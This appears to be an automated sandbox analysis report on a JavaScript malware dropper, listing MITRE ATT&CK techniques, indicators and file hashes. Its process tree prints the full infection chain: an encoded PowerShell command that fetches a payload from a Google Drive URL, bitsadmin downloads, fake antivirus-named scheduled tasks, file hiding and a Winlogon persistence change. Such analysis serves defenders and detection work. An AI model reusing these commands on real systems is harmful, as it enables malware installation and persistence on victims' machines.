e632c7853782a7d4251f761a03037ca33e2421b2bec28d4afefb8ae516460c88

Analysis

max time kernel
152s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
14-10-2023 03:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

½ļ/22.js
Size

8KB
MD5

93713221ec3d756d1091b3a05d489ef8
SHA1

1314a70eea9319ac8658b2047648c2093307fc5b
SHA256

76e50a76cc320a29117e8466db4f31ba6f04510f07811536654e5316ace67b2d
SHA512

b1128128bf3aae525694d5c6d9f1ecd009674beea5e3c1ded93078f8e5c3edc8b0372ae3e05c7bb383bab755d5d96caf8e215036f915338a20b10971694d683e
SSDEEP

12:4XF1YOUhNJeyM121Evnps8Cnon1YVkVfNb5j0BbRZBbwGk3:4XFSZXe8EvpsheaOVfsBbRZBbC3

Score

10^/10

evasion persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1bDMmMiZveQVwS9Ni4mQLsBYrsYXm_mY9

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\ProgramData\\Antivirus\\GoogleUpdate\""	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg

Blocklisted process makes network request 2 IoCs

flow	pid	Process
23	3824	powershell.exe
26	3824	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1272	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
820	schtasks.exe
3640	schtasks.exe

Download via BitsAdmin 1 TTPs 3 IoCs

dropper

BITS Jobs

T1197

pid	Process
2668	bitsadmin.exe
2540	bitsadmin.exe
2096	bitsadmin.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\LocalAnyName.Anyname:AnyName.Anyname	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3452	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3824	powershell.exe
3824	powershell.exe
3824	powershell.exe
3184	powershell.exe
3184	powershell.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
3184	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 4476 wrote to memory of 3976	4476	wscript.exe	84
PID 4476 wrote to memory of 3976	4476	wscript.exe	84
PID 3976 wrote to memory of 4008	3976	cmd.exe	86
PID 3976 wrote to memory of 4008	3976	cmd.exe	86
PID 4008 wrote to memory of 3824	4008	cmd.exe	87
PID 4008 wrote to memory of 3824	4008	cmd.exe	87
PID 3824 wrote to memory of 3308	3824	powershell.exe	91
PID 3824 wrote to memory of 3308	3824	powershell.exe	91
PID 3308 wrote to memory of 3188	3308	csc.exe	92
PID 3308 wrote to memory of 3188	3308	csc.exe	92
PID 3824 wrote to memory of 4620	3824	powershell.exe	93
PID 3824 wrote to memory of 4620	3824	powershell.exe	93
PID 3824 wrote to memory of 4016	3824	powershell.exe	94
PID 3824 wrote to memory of 4016	3824	powershell.exe	94
PID 4016 wrote to memory of 4344	4016	cmd.exe	95
PID 4016 wrote to memory of 4344	4016	cmd.exe	95
PID 4344 wrote to memory of 1256	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	98
PID 4344 wrote to memory of 1256	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	98
PID 4344 wrote to memory of 1424	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	100
PID 4344 wrote to memory of 1424	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	100
PID 4344 wrote to memory of 3356	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	99
PID 4344 wrote to memory of 3356	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	99
PID 4344 wrote to memory of 4424	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	104
PID 4344 wrote to memory of 4424	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	104
PID 4344 wrote to memory of 3216	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	106
PID 4344 wrote to memory of 3216	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	106
PID 4344 wrote to memory of 404	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	107
PID 4344 wrote to memory of 404	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	107
PID 4344 wrote to memory of 644	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	109
PID 4344 wrote to memory of 644	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	109
PID 4344 wrote to memory of 3720	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	112
PID 4344 wrote to memory of 3720	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	112
PID 4344 wrote to memory of 1912	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	115
PID 4344 wrote to memory of 1912	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	115
PID 4344 wrote to memory of 1604	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	114
PID 4344 wrote to memory of 1604	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	114
PID 1912 wrote to memory of 3184	1912	cmd.exe	120
PID 1912 wrote to memory of 3184	1912	cmd.exe	120
PID 1604 wrote to memory of 4308	1604	cmd.exe	121
PID 1604 wrote to memory of 4308	1604	cmd.exe	121
PID 3720 wrote to memory of 2096	3720	cmd.exe	122
PID 3720 wrote to memory of 2096	3720	cmd.exe	122
PID 4424 wrote to memory of 2540	4424	cmd.exe	119
PID 4424 wrote to memory of 2540	4424	cmd.exe	119
PID 3216 wrote to memory of 2668	3216	cmd.exe	118
PID 3216 wrote to memory of 2668	3216	cmd.exe	118
PID 4344 wrote to memory of 3780	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	123
PID 4344 wrote to memory of 3780	4344	J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg	123
PID 3780 wrote to memory of 1272	3780	cmd.exe	126
PID 3780 wrote to memory of 1272	3780	cmd.exe	126
PID 4308 wrote to memory of 820	4308	powershell.exe	128
PID 4308 wrote to memory of 820	4308	powershell.exe	128
PID 3184 wrote to memory of 3640	3184	powershell.exe	129
PID 3184 wrote to memory of 3640	3184	powershell.exe	129
PID 3780 wrote to memory of 3452	3780	cmd.exe	130
PID 3780 wrote to memory of 3452	3780	cmd.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1272	attrib.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\½ļ\22.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4476
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" cmD /c ECHo PoweRSHEll -ec aQBFAHgAKAAoAE4AZQBXAC0ATwBiAGoARQBjAFQAIAAJAG4ARQBUAC4AdwBFAEIAYwBMAEkAZQBOAHQAKQAuAGQAbwBXAE4ATABPAEEAZABzAFQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGQAcgBpAHYAZQAuAGcAbwBvAGcAbABlAC4AYwBvAG0ALwB1AGMAPwBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAmAGMAbwBuAGYAaQByAG0APQBuAG8AXwBhAG4AdABpAHYAaQByAHUAcwAmAGkAZAA9ADEAYgBEAE0AbQBNAGkAWgB2AGUAUQBWAHcAUwA5AE4AaQA0AG0AUQBMAHMAQgBZAHIAcwBZAFgAbQBfAG0AWQA5ACcAKQApAA== > %LOCALAPPDATA%AnyName.Anyname:AnyName.Anyname & CMD - < %LOCALAPPDATA%AnyName.Anyname:AnyName.Anyname
  2⤵
  - NTFS ADS
  - Suspicious use of WriteProcessMemory
  PID:3976
- - C:\Windows\system32\cmd.exe
    CMD -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PoweRSHEll -ec aQBFAHgAKAAoAE4AZQBXAC0ATwBiAGoARQBjAFQAIAAJAG4ARQBUAC4AdwBFAEIAYwBMAEkAZQBOAHQAKQAuAGQAbwBXAE4ATABPAEEAZABzAFQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGQAcgBpAHYAZQAuAGcAbwBvAGcAbABlAC4AYwBvAG0ALwB1AGMAPwBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAmAGMAbwBuAGYAaQByAG0APQBuAG8AXwBhAG4AdABpAHYAaQByAHUAcwAmAGkAZAA9ADEAYgBEAE0AbQBNAGkAWgB2AGUAUQBWAHcAUwA5AE4AaQA0AG0AUQBMAHMAQgBZAHIAcwBZAFgAbQBfAG0AWQA5ACcAKQApAA==
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3824
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bxo15lkz\bxo15lkz.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3308
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD45.tmp" "c:\Users\Admin\AppData\Local\Temp\bxo15lkz\CSCA6177B87EF944ECE9B401DD379682B36.TMP"
        6⤵
        
        PID:3188
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copy /B %LOCALAPPDATA%\U767J7I7IMII7I.bmp + %LOCALAPPDATA%\6u7u7ujye6rej6r6jrk7yrj76kr76kr7676kk76.avi %LOCALAPPDATA%\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg
        5⤵
        
        PID:4620
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k StarT %LOCALAPPDATA%\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4016
      - C:\Users\Admin\AppData\Local\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg
        
        C:\Users\Admin\AppData\Local\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4344
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\BT272FC6-Q225-48E0-576F-FF17AB2168B3\Chromium\
        7⤵
        
        PID:1256
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\%APPDATA%\"Adobe\XC5EC9ED-BDA0-4812-70BA-9F658FFBFR2E\Holidaymakers..\
        7⤵
        
        PID:3356
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\Emsisoft\uTorrent..\
        7⤵
        
        PID:1424
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\BT272FC6-Q225-48E0-576F-FF17AB2168B3\Chromium\\GoogleUpdateCore.exe" "C:\ProgramData\Emsisoft\uTorrent..\\uninstall"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4424
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\BT272FC6-Q225-48E0-576F-FF17AB2168B3\Chromium\\GoogleUpdateCore.exe" "C:\ProgramData\Emsisoft\uTorrent..\\uninstall"
        8⤵
        Download via BitsAdmin
        
        PID:2540
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\BT272FC6-Q225-48E0-576F-FF17AB2168B3\Chromium\\GoogleUpdateCore.exe" %APPDATA%\\"Adobe\XC5EC9ED-BDA0-4812-70BA-9F658FFBFR2E\Holidaymakers..\\CrashSender"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3216
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\BT272FC6-Q225-48E0-576F-FF17AB2168B3\Chromium\\GoogleUpdateCore.exe" C:\Users\Admin\AppData\Roaming\\"Adobe\XC5EC9ED-BDA0-4812-70BA-9F658FFBFR2E\Holidaymakers..\\CrashSender"
        8⤵
        Download via BitsAdmin
        
        PID:2668
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\Antivirus\
        7⤵
        
        PID:404
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\%APPDATA%\"Microsoft\ZoneAlarm\Mediterranean..\
        7⤵
        
        PID:644
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\Antivirus\\GoogleUpdate" %APPDATA%\\"Microsoft\ZoneAlarm\Mediterranean..\\GoogleUpdate"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3720
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\Antivirus\\GoogleUpdate" C:\Users\Admin\AppData\Roaming\\"Microsoft\ZoneAlarm\Mediterranean..\\GoogleUpdate"
        8⤵
        Download via BitsAdmin
        
        PID:2096
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Malwarebytes" /tr C:\Users\Admin\AppData\Roaming\Microsoft\ZoneAlarm\Mediterranean..\\GoogleUpdate
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Malwarebytes" /tr C:\Users\Admin\AppData\Roaming\Microsoft\ZoneAlarm\Mediterranean..\\GoogleUpdate
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4308
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc minute /mo 60 /tn Malwarebytes /tr C:\Users\Admin\AppData\Roaming\Microsoft\ZoneAlarm\Mediterranean..\\GoogleUpdate
        9⤵
        Creates scheduled task(s)
        
        PID:820
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "ClamAV" /tr C:\Users\Admin\AppData\Roaming\Adobe\XC5EC9ED-BDA0-4812-70BA-9F658FFBFR2E\Holidaymakers..\\CrashSender
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "ClamAV" /tr C:\Users\Admin\AppData\Roaming\Adobe\XC5EC9ED-BDA0-4812-70BA-9F658FFBFR2E\Holidaymakers..\\CrashSender
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3184
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc minute /mo 60 /tn ClamAV /tr C:\Users\Admin\AppData\Roaming\Adobe\XC5EC9ED-BDA0-4812-70BA-9F658FFBFR2E\Holidaymakers..\\CrashSender
        9⤵
        Creates scheduled task(s)
        
        PID:3640
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c attrib +s +h "Adobe\XC5EC9ED-BDA0-4812-70BA-9F658FFBFR2E\Holidaymakers..\\CrashSender" & ping 1.1.1.1 -n 1 -w & del "C:\Users\Admin\AppData\Local\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3780
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "Adobe\XC5EC9ED-BDA0-4812-70BA-9F658FFBFR2E\Holidaymakers..\\CrashSender"
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1272
        
        C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w
        8⤵
        Runs ping.exe
        
        PID:3452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

BITS Jobs

T1197

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\6u7u7ujye6rej6r6jrk7yrj76kr76kr7676kk76.avi

Filesize
103KB

MD5
56960517530af28d40fb24216e7bc0c8

SHA1
905b4ad08aecd41672443bbde29b837ca71ed105

SHA256
5bf977df9638c69a0c0125d77eeed9c4be478fe242a41e21ee835978552b051c

SHA512
25ae2461f8829a96b7de564bf85b30ee1b9e9c9569a4a1fe41fe9dfc9563ebd55395fd171b3c27a4f9df9742434069937c799f074254c2f2304e33e83f910948

Download Submit
C:\Users\Admin\AppData\Local\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg

Filesize
1.4MB

MD5
67655830367e4504eb522fe50f512dc3

SHA1
e7440af7777261987fc15c789167e531e87b5264

SHA256
28d4ebeae41d1c35c8b17c1374cd59fa8f472139f5251c763b46725ba8610132

SHA512
d989177b682cd51c058b51a86c07ea3c6f7fb0d2c42043598c72d47098aeb4ee978e20bc89d3ead40f1d618ffc399026ae0d87bf71fd256d532f9c0735de9330

Download Submit
C:\Users\Admin\AppData\Local\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg

Filesize
1.4MB

MD5
67655830367e4504eb522fe50f512dc3

SHA1
e7440af7777261987fc15c789167e531e87b5264

SHA256
28d4ebeae41d1c35c8b17c1374cd59fa8f472139f5251c763b46725ba8610132

SHA512
d989177b682cd51c058b51a86c07ea3c6f7fb0d2c42043598c72d47098aeb4ee978e20bc89d3ead40f1d618ffc399026ae0d87bf71fd256d532f9c0735de9330

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD45.tmp

Filesize
1KB

MD5
9dd11edaad3266e9bc61083668debf3e

SHA1
cc01dad4296331f973ff9672c6055baeec12e9d8

SHA256
0c334772188782128aa0b7bec1ab0cfcb6c701c8e4a599696b750134a2bd9c5b

SHA512
c2dbfd5f896f3e042a2574c456232f49e9ae8af93746f6f7de63561aee47d575a7ad0e8697b71eefb619425e812fed5576c7d36fde894c8eece3ed55d8eb6119

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_33qc1ubw.pm5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bxo15lkz\bxo15lkz.dll

Filesize
3KB

MD5
877012a4d19e74b4d4d65d405f06840d

SHA1
8a2de102c4f4ba6cfd548e982fe70d2d1dff3e51

SHA256
2bcf4c09ed38f8c6c09ca9899c15295ac6c42966197da2aa8e115d05a9164591

SHA512
1078142857bee53001cadb06a8213c791592f38539cad12b951ff4b60870ba4c07f7a0de1a2dba756224870fe5201603f78bdc29cc900570d892a535a29ae195

Download Submit
C:\Users\Admin\AppData\Local\U767J7I7IMII7I.bmp

Filesize
1.3MB

MD5
da931a33c6dd88f17bd73fad95cc726a

SHA1
475ebaa95e75c75f3129b536b9e5725af84e9766

SHA256
4d3992da2f6fc16a3a19acbf990696f61309078a4255b1f7f86a87c8d02d8f14

SHA512
0ea0456f53a026396c079c796cbf5c7ac32272221e86fd2383c0d6397731284563f72fd150503d2b22590d3ea88fea18bbb27194a0c77e23e668d27cd764a61f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bxo15lkz\CSCA6177B87EF944ECE9B401DD379682B36.TMP

Filesize
652B

MD5
0ddbdc2c70bc4e4d8986f1c4e5d7a5e1

SHA1
dcba4d74be3bc43f0c154dedd064c50e02ec434c

SHA256
b3e9340401321c426fcaae91b56fe9c28b003bb88699afe7f7df77b3c4666397

SHA512
a46054c69f93525434826ffb78ffc4a75cf4ff082147fea0e510598c07e31d93effd8420ca06837c9072d0f0f69430de12ed41d11ad2335904ec24409bb63882

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bxo15lkz\bxo15lkz.0.cs

Filesize
4KB

MD5
7fe88e1b8c1cec742f7133165520183a

SHA1
017135b61569de732386b7dc19b657d98d447cb5

SHA256
0bedae788053647754b795320db78e5fa2a4fd2af95075443e15e4127d33f14b

SHA512
17ffb73392306636699341596a0dcaa0417ebdd61f8a9eae6e6b9832a016a72cfaf9a7227206ed42efad1f3a359c7650b7faeee3ee6f94b292bc544e0c45b218

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bxo15lkz\bxo15lkz.cmdline

Filesize
369B

MD5
cefbfd42347d93636105b6ae32494bf5

SHA1
f8498571db7945a46d6963be809e2133fd1b5041

SHA256
9420a0edd480b9fbf9e383bc2082222fc8a763de371450f55bbf0ba9e6a1b0af

SHA512
d23cc14b5fbbe9a8352bab560ac1c89ac87c19e981425d6c189153d945cf53936aa0ad8c3e823dff3a5aef009158bdda2bc194200abb5f9ba6d42379e4ef2efc

Download Submit
memory/3184-54-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/3184-55-0x000001A9535C0000-0x000001A9535D0000-memory.dmp

Filesize
64KB

Download
memory/3184-78-0x000001A9535C0000-0x000001A9535D0000-memory.dmp

Filesize
64KB

Download
memory/3184-83-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/3184-84-0x000001A9535C0000-0x000001A9535D0000-memory.dmp

Filesize
64KB

Download
memory/3184-89-0x000001A9535C0000-0x000001A9535D0000-memory.dmp

Filesize
64KB

Download
memory/3824-45-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/3824-17-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/3824-10-0x000001BEFFE60000-0x000001BEFFE82000-memory.dmp

Filesize
136KB

Download
memory/3824-11-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/3824-44-0x000001BE9A470000-0x000001BE9A68C000-memory.dmp

Filesize
2.1MB

Download
memory/3824-20-0x000001BE81830000-0x000001BE81840000-memory.dmp

Filesize
64KB

Download
memory/3824-12-0x000001BE81830000-0x000001BE81840000-memory.dmp

Filesize
64KB

Download
memory/3824-30-0x000001BE9A9E0000-0x000001BE9A9E8000-memory.dmp

Filesize
32KB

Download
memory/3824-13-0x000001BE81830000-0x000001BE81840000-memory.dmp

Filesize
64KB

Download
memory/3824-14-0x000001BE9A470000-0x000001BE9A68C000-memory.dmp

Filesize
2.1MB

Download
memory/3824-18-0x000001BE81830000-0x000001BE81840000-memory.dmp

Filesize
64KB

Download
memory/4308-87-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/4308-85-0x00000251F59D0000-0x00000251F59E0000-memory.dmp

Filesize
64KB

Download
memory/4308-65-0x00000251F59D0000-0x00000251F59E0000-memory.dmp

Filesize
64KB

Download
memory/4308-66-0x00000251F59D0000-0x00000251F59E0000-memory.dmp

Filesize
64KB

Download
memory/4308-67-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/4308-77-0x00000251F59D0000-0x00000251F59E0000-memory.dmp

Filesize
64KB

Download
memory/4308-86-0x00000251F59D0000-0x00000251F59E0000-memory.dmp

Filesize
64KB

Download
memory/4308-80-0x00000251F68D0000-0x00000251F6914000-memory.dmp

Filesize
272KB

Download
memory/4308-88-0x00000251F59D0000-0x00000251F59E0000-memory.dmp

Filesize
64KB

Download
memory/4308-82-0x00000251F69A0000-0x00000251F6A16000-memory.dmp

Filesize
472KB

Download
memory/4344-48-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/4344-81-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/4344-53-0x000000001BAD0000-0x000000001BAE0000-memory.dmp

Filesize
64KB

Download
memory/4344-49-0x000000001CCF0000-0x000000001CD8E000-memory.dmp

Filesize
632KB

Download
memory/4344-47-0x000000001BAD0000-0x000000001BAE0000-memory.dmp

Filesize
64KB

Download
memory/4344-41-0x00007FFF67720000-0x00007FFF681E1000-memory.dmp

Filesize
10.8MB

Download
memory/4344-40-0x0000000000FD0000-0x000000000112C000-memory.dmp

Filesize
1.4MB

Download